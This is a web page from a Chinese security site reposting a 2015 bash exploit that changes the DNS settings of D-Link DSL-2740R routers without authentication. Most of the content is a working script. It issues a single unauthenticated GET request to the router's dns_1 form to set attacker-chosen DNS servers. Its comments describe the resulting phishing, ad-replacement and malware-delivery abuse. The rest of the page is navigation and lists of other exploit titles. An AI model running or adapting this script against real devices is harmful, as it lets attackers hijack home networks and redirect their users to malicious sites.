首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit 来源：http://www.ethical-hacker.org/ 作者：Donev 发布时间：2015-01-28   #!/bin/bash # #  D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit # #  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> #  http://www.ethical-hacker.org/ #  #  Description:  #  Different D-Link Routers are vulnerable to DNS change. #  The vulnerability exist in the web interface, which is #  accessible without authentication. # #  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link #  DEVICES MAY AFFECTED. # #  Once modified, systems use foreign DNS servers,  which are #  usually set up by cybercriminals. Users with vulnerable #  systems or devices who try to access certain sites are #  instead redirected to possibly malicious sites. #  #  Modifying systems' DNS settings allows cybercriminals to #  perform malicious activities like: # #    o  Steering unknowing users to bad sites: #       These sites can be phishing pages that #       spoof well-known sites in order to #       trick users into handing out sensitive #       information. # #    o  Replacing ads on legitimate sites: #       Visiting certain sites can serve users #       with infected systems a different set #       of ads from those whose systems are #       not infected. #   #    o  Controlling and redirecting network traffic: #       Users of infected systems may not be granted #       access to download important OS and software #       updates from vendors like Microsoft and from #       their respective security vendors. # #    o  Pushing additional malware: #       Infected systems are more prone to other #       malware infections (e.g., FAKEAV infection). # #     if [[ $# -gt 3 || $# -lt 2 ]]; then         echo "     D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"         echo "  ================================================================"         echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"         echo "  Example: $0 192.168.1.1 8.8.8.8"         echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"         echo ""         echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"         echo "                  http://www.ethical-hacker.org/"         exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then         echo "  Error : libwww-perl not found =/"         exit; fi         GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Symantec Data Center Security ·Qualys Security Advisory - gli ·PHP Webquest 2.6 - SQL Injecti ·FreeBSD Kernel Crash / Code Ex ·Comodo Backup 4.4.0.0 - NULL P ·ClearSCADA - Remote Authentica ·Android WiFi-Direct Denial of ·Exim ESMTP GHOST Denial Of Ser ·Zhone GPON 2520 R4.0.2.566b - ·VSAT Sailor 900 - Remote Explo ·Cisco Ironport Appliances Priv ·OS X < 10.10.x - Gatekeeper by   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved